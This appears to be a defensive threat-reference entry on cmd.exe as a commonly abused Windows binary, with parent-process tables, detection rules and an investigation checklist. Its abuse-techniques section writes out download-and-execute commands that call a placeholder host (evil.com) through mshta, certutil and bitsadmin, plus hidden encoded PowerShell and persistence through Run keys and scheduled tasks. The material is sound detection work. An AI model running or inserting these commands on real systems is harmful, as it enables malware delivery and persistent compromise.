cmd.exe - Windows Command Interpreter Security Analysis
Tags: High Risk, Windows, Legitimate, Commonly Abused, System Utility
cmd.exe is the Windows Command Interpreter, providing command-line access to the operating system. It is a critical LOLBin, heavily abused for execution, payload delivery, and persistence. Most Windows attack chains invoke cmd.exe at some stage, usually as a thin wrapper (cmd /c ...) around the tool that does the real work, so the interesting signal is almost always in the parent process and the command line rather than in cmd.exe itself.
Risk Summary
HIGH priority. cmd.exe is used in nearly every attack. Focus on: unusual parent processes, encoded commands, network download attempts, and persistence mechanisms.
Overview
What is cmd.exe?
cmd.exe is the Windows Command Interpreter (Command Prompt).
Security Significance
- Universal Abuse: Appears in most attack chains, typically as cmd /c wrapping another tool
- LOLBin: Living-off-the-Land Binary, signed by Microsoft and present on every Windows host
- Payload Delivery: Wraps download-and-execute commands (certutil, bitsadmin, mshta, PowerShell)
- Persistence: Establishes persistence via registry Run keys and scheduled tasks
Normal Behavior
Expected Parents
| Parent | Context |
|---|---|
| explorer.exe | User launches CMD |
| services.exe | Service execution |
| svchost.exe | Scheduled tasks |
Suspicious Parents
| Parent | Risk |
|---|---|
| winword.exe | CRITICAL - Macro execution |
| excel.exe | CRITICAL - Macro execution |
| outlook.exe | CRITICAL - Email exploit |
| iexplore.exe | HIGH - Browser exploit |
Common Locations
- C:\Windows\System32\cmd.exe
- C:\Windows\SysWOW64\cmd.exe
Suspicious Indicators
Legitimate vs Suspicious
SUSPICIOUS PATTERNS
- Parent: Office apps, browsers
- Command: /c powershell, /c certutil, /c bitsadmin, /c mshta
- Network: Download attempts
High-Risk Commands
| Pattern | Risk |
|---|---|
| cmd /c powershell -enc | CRITICAL |
| cmd /c certutil -urlcache | HIGH |
| cmd /c bitsadmin /transfer | HIGH |
| cmd /c echo [base64] ... \| base64 decode (payload staging) | HIGH |
Abuse Techniques
Technique #1: Payload Execution
cmd /c powershell -nop -w hidden -enc [base64]
cmd /c mshta http://evil.com/payload.hta
Technique #2: Download and Execute
cmd /c certutil -urlcache -f http://evil.com/mal.exe c:\temp\mal.exe && c:\temp\mal.exe
cmd /c bitsadmin /transfer job http://evil.com/mal.exe c:\temp\mal.exe
Technique #3: Persistence
cmd /c reg add HKCU\...\Run /v Malware /d payload.exe
cmd /c schtasks /create /tn "Update" /tr payload.exe /sc onlogon
Detection Guidance
Priority #1: Suspicious Parent
Process = "cmd.exe" AND
Parent IN ("winword.exe", "excel.exe", "outlook.exe")
→ ALERT: CRITICAL
Priority #2: Download Commands
CommandLine CONTAINS ("certutil -urlcache", "bitsadmin /transfer", "Invoke-WebRequest")
→ ALERT: HIGH
Priority #3: Encoded Commands
CommandLine CONTAINS "powershell" AND ("-e ", "-ec ", "-enc", "-EncodedCommand")
→ ALERT: HIGH
Note: PowerShell accepts any unambiguous prefix of -EncodedCommand, so a rule that only matches the literal "-enc" misses "-e" and "-ec". Decode the base64 blob as UTF-16LE to see the actual script.
Remediation Steps
- Capture command line
- Identify malicious payload
- Check for persistence
- Remove downloaded files
- Hunt for lateral movement
Investigation Checklist
- Verify cmd.exe path (System32 or SysWOW64; any other location indicates masquerading)
- Review parent process
- Analyze command-line arguments
- Check for download activity
- Review child processes
- Look for persistence mechanisms